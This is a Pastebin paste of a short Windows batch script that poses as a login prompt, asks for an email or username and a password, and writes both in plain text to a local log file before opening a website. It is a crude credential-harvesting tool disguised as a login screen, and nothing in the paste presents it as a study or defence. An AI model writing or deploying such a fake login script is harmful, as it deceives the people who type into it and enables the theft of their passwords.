Guest User

Untitled

a guest
Mar 13th, 2018
44
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 0.30 KB | None | 0 0
  1.     @echo off
  2.     color a
  3.     title Login
  4.     cls
  5.     echo Please Enter Your Email Address And Password
  6.     echo.
  7.     echo.
  8.     cd C:\Logs
  9.     set /p user=Username:
  10.     set /p pass=Password:
  11.     echo Username=”%user%Password=”%pass%>> Log.txt
  12.     start https://techcaption.com/
  13.     exit
Add Comment
Please, Sign In to add comment